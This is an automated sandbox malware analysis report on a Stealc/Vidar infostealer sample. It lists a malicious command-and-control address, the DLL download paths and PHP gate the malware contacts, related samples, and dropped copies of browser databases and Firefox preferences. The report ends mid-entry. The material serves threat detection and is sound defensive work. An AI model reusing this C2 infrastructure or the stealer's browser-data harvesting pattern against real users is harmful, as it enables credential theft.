C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	0%	ReversingLabs

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
http://185.215.113.37/	100%	URL Reputation	malware
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
http://185.215.113.37/0d60be0de163924d/nss3.dll	100%	URL Reputation	malware
http://185.215.113.37	100%	URL Reputation	malware
http://185.215.113.37/0d60be0de163924d/mozglue.dll	100%	URL Reputation	malware
http://185.215.113.37/0d60be0de163924d/softokn3.dll	100%	URL Reputation	malware
http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	100%	URL Reputation	malware
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://185.215.113.37/0d60be0de163924d/freebl3.dll	100%	URL Reputation	malware
http://185.215.113.37/e2b1563c6670f193.php	100%	URL Reputation	malware
http://www.sqlite.org/copyright.html.	0%	URL Reputation	safe
https://mozilla.org0/	0%	URL Reputation	safe
http://185.215.113.37/0d60be0de163924d/sqlite3.dll	100%	URL Reputation	malware
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
http://185.215.113.37/0d60be0de163924d/msvcp140.dll	100%	URL Reputation	malware
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	0%	URL Reputation	safe
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL	0%	URL Reputation	safe
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	0%	URL Reputation	safe
https://support.mozilla.org	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.37/	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/nss3.dll	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/mozglue.dll	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/softokn3.dll	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/freebl3.dll	true	URL Reputation: malware	unknown
http://185.215.113.37/e2b1563c6670f193.php	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/sqlite3.dll	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/msvcp140.dll	true	URL Reputation: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://185.215.113.37/e2b1563c6670f193.phpm-LTC	file.exe, 00000000.00000002.2321619295.0000000000F56000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://duckduckgo.com/chrome_newtab	file.exe, 00000000.00000003.2212948932.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, CAAAFCAK.0.dr	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	file.exe, 00000000.00000003.2212948932.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, CAAAFCAK.0.dr	false	URL Reputation: safe	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	KFCFBFHIEBKJKFHIEBFB.0.dr	false		unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	file.exe, 00000000.00000002.2338716938.0000000029832000.00000004.00000020.00020000.00000000.sdmp, KFCFBFHIEBKJKFHIEBFB.0.dr	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	file.exe, 00000000.00000003.2212948932.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, CAAAFCAK.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37	file.exe, 00000000.00000002.2321619295.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmp	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/sqlite3.dllRA	file.exe, 00000000.00000002.2321619295.0000000000F37000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpge	file.exe, 00000000.00000002.2321619295.0000000000F56000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/JM$n	file.exe, 00000000.00000002.2321619295.0000000000F37000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpimple-storage.json	file.exe, 00000000.00000002.2321619295.0000000000F56000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpr	file.exe, 00000000.00000002.2321619295.0000000000F37000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/0d60be0de163924d/freebl3.dllV	file.exe, 00000000.00000002.2321619295.0000000000F37000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37.com	file.exe, 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmp	true		unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	file.exe, 00000000.00000003.2212948932.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, CAAAFCAK.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpser	file.exe, 00000000.00000002.2338716938.0000000029832000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/0d60be0de163924d/nss3.dll(	file.exe, 00000000.00000002.2321619295.0000000000F23000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://www.sqlite.org/copyright.html.	file.exe, 00000000.00000002.2333473274.000000001D769000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2345776193.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.mozilla.com/en-US/blocklist/	file.exe, file.exe, 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	false		unknown
https://mozilla.org0/	freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	file.exe, 00000000.00000003.2212948932.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, CAAAFCAK.0.dr	false		unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	file.exe, 00000000.00000003.2212948932.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, CAAAFCAK.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/0d60be0de163924d/nss3.dllB	file.exe, 00000000.00000002.2321619295.0000000000F23000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpF	file.exe, 00000000.00000002.2321619295.0000000000F37000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://www.ecosia.org/newtab/	file.exe, 00000000.00000003.2212948932.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, CAAAFCAK.0.dr	false	URL Reputation: safe	unknown
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta	file.exe, 00000000.00000002.2338716938.0000000029832000.00000004.00000020.00020000.00000000.sdmp, KFCFBFHIEBKJKFHIEBFB.0.dr	false	URL Reputation: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	FCFHJKJJJECGDHJJDHDAAAFBKF.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.php.	file.exe, 00000000.00000002.2321619295.0000000000F37000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://ac.ecosia.org/autocomplete?q=	file.exe, 00000000.00000003.2212948932.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, CAAAFCAK.0.dr	false	URL Reputation: safe	unknown
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg	file.exe, 00000000.00000002.2338716938.0000000029832000.00000004.00000020.00020000.00000000.sdmp, KFCFBFHIEBKJKFHIEBFB.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.php/	file.exe, 00000000.00000002.2338716938.0000000029832000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	file.exe, 00000000.00000002.2338716938.0000000029832000.00000004.00000020.00020000.00000000.sdmp, KFCFBFHIEBKJKFHIEBFB.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/0d60be0de163924d/nss3.dllU	file.exe, 00000000.00000002.2321619295.0000000000F23000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.php3	file.exe, 00000000.00000002.2338716938.0000000029832000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.php:	file.exe, 00000000.00000002.2338716938.0000000029832000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL	FCFHJKJJJECGDHJJDHDAAAFBKF.0.dr	false	URL Reputation: safe	unknown
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	file.exe, 00000000.00000002.2338716938.0000000029832000.00000004.00000020.00020000.00000000.sdmp, KFCFBFHIEBKJKFHIEBFB.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpwser	file.exe, 00000000.00000002.2321619295.0000000000F56000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477	file.exe, 00000000.00000002.2338716938.0000000029832000.00000004.00000020.00020000.00000000.sdmp, KFCFBFHIEBKJKFHIEBFB.0.dr	false		unknown
https://support.mozilla.org	FCFHJKJJJECGDHJJDHDAAAFBKF.0.dr	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	file.exe, 00000000.00000003.2212948932.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, CAAAFCAK.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/0d60be0de163924d/softokn3.dll$A	file.exe, 00000000.00000002.2321619295.0000000000F37000.00000004.00000020.00020000.00000000.sdmp	true		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.37	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1532853
Start date and time:	2024-10-14 01:52:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 52s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/23@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 86% Number of executed functions: 78 Number of non-executed functions: 114
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.37	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	SecuriteInfo.com.Trojan.GenericKD.74258817.17122.7170.exe	Get hash	malicious	Vidar, Xmrig	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	ND2WP0Fip7.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	C5u5BZq8gj.exe	Get hash	malicious	Vidar	Browse
C:\ProgramData\mozglue.dll	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	SecuriteInfo.com.Trojan.GenericKD.74258817.17122.7170.exe	Get hash	malicious	Vidar, Xmrig	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	ND2WP0Fip7.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	C5u5BZq8gj.exe	Get hash	malicious	Vidar	Browse

Created / dropped Files

C:\ProgramData\AKFCFBAAEHCFHJJKEHJK

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CAAAFCAK

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EBFBFBFIIJDAKECAKKJEHCFIJK

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\FCFHJKJJJECGDHJJDHDAAAFBKF

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03859996294213402
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
MD5:	D2A38A463B7925FE3ABE31ECCCE66ACA
SHA1:	A1824888F9E086439B287DEA497F660F3AA4B397
SHA-256:	474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
SHA-512:	62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GDBAKKKFBGDHJKFHJJJJ

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JJDBAAEGDBKKECBGIJEBGDAEBF

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8439810553697228
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
MD5:	9D46F142BBCF25D0D495FF1F3A7609D3
SHA1:	629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
SHA-256:	C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
SHA-512:	AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KECGDBFCBKFIDHIDHDHIECGDHC

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KFCFBFHIEBKJKFHIEBFB

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1743), with CRLF line terminators
Category:	dropped
Size (bytes):	9504
Entropy (8bit):	5.512408163813622
Encrypted:	false
SSDEEP:	192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
MD5:	1191AEB8EAFD5B2D5C29DF9B62C45278
SHA1:	584A8B78810AEE6008839EF3F1AC21FD5435B990
SHA-256:	0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
SHA-512:	86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\KKECFIEB

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan.GenericKD.74258817.17122.7170.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: ND2WP0Fip7.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: C5u5BZq8gj.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
